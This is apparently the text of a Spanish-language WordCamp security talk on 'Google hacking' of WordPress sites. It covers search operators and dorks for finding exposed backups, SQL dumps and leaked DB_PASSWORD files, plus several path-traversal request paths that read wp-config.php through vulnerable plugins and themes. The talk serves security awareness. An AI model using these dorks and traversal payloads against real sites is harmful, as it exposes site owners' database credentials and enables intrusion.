Академический Документы
Профессиональный Документы
Культура Документы
Organizador el Congreso de
Seguridad Sh3llcon
Organizador de la WordCamp
Santander y miembro de la
comunidad WordPress de España.
#WCIrun
@TomyCant
Hackear…
Google?
una página web?
las búsquedas?
…?
#WCIrun
● Localizar objetivo
● Recopilar información
● Identificar vulnerabilidades
● Explotar vulnerabilidades y acceder
● Ataque
● Borrado de huellas
● Mantener el acceso, para futuras ocasiones
#WCIrun
● Localizar objetivo
● Recopilar información
● Identificar vulnerabilidades
● Explotar vulnerabilidades y acceder
● Ataque
● Borrado de huellas
● Mantener el acceso, para futuras ocasiones
#WCIrun
Operadores
@TomyCant
#WCIrun
Operadores
@TomyCant
“”
Muestra resultados que contengan la frase exacta
#WCIrun
Operadores
@TomyCant
-
Antes de una palabra, nos permite realizar una
búsqueda que NO incluya esa palabra.
#WCIrun
Operadores
@TomyCant
+
Antes de una palabra, nos permite realizar una
búsqueda que incluya obligatoriamente esa
palabra.
Operadores
@TomyCant
AND
Operadores
@TomyCant
OR (|)
Operadores
@TomyCant
Comodines
*
Una palabra (la que sea)
.
Varias palabras (las que sean)
#WCIrun
Comandos
@TomyCant
#WCIrun
Comandos
@TomyCant
site:url
site:tomassierra.com vulnerabilidades
#WCIrun
Comandos
@TomyCant
intitle:término
intitle:Vulnerabilidades
intitle:WordPress AND seguridad
#WCIrun
Comandos
@TomyCant
inurl:término
inurl:/wp-content/
inurl:/wp-content/plugins
#WCIrun
Comandos
@TomyCant
related:URL
related:tomassierra.com
#WCIrun
Comandos
@TomyCant
filetype:extensión
filetype:pdf ciberseguridad
#WCIrun
Google Dorks
@TomyCant
#WCIrun
Google Dorks
@TomyCant
Uno sencillito…
...pero peligroso
index of
Index of /wp-content/plugins/duplicator
site:tomassierra.com Index of
inurl:/wp-content/plugins/duplicator
#WCIrun
Google Dorks
@TomyCant
filetype:pdf site:tomassierra.com
filetype:docx site:tomassierra.com
filetype:txt site:tomassierra.com
#WCIrun
Google Dorks
@TomyCant
Más preciso
site:tomassierra.com filetype:pdf
intext:wordcamp
#WCIrun
Google Dorks
@TomyCant
Todos a la vez
site:tomassierra.com (filetype:pdf |
filetype:ppt | filetype:xls | filetype:doc |
filetype:docx | filetype:odt | filetype:txt
| filetype:sql)
#WCIrun
Google Dorks
@TomyCant
#WCIrun
Google Dorks
@TomyCant
"inurl:"/wp-content/wpclone-temp/wpclone_bac
kup/"
inurl:"/wp-content/uploads/backup"
"inurl:wp-content/plugins/wp-dbmanager/"
#WCIrun
Google Dorks
@TomyCant
intext:DB_PASSWORD || intext:”MySQL
hostname” ext:txt
inurl:/wp-content/uploads/ filetype:sql
...
#WCIrun
Path traversal
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
...
#WCIrun
https://www.exploit-db.com/google-hacking-database/
#WCIrun
¿Y ahora qué?
@TomyCant
¿Y ahora qué?
@TomyCant
¿Y ahora qué?
@TomyCant
¿Y ahora qué?
@TomyCant
https://wpvulndb.com/
#WCIrun
¿Y ahora qué?
@TomyCant
https://www.exploit-db.com/
#WCIrun
¿Y ahora qué?
@TomyCant
Recordamos:
● Localizar objetivo
● Recopilar información
● Identificar vulnerabilidades
● Explotar vulnerabilidades y acceder
● Ataque
● Borrado de huellas
● Mantener el acceso, para futuras ocasiones
#WCIrun
Google WPDanger
@TomyCant
https://google.wpdanger.com
#WCIrun
WPDanger
@TomyCant
https://wpdanger.com
TEN CUIDADIIIN
#WCIrun
www.tomassierra.com
ESKERRIK ASKO
@Tomycant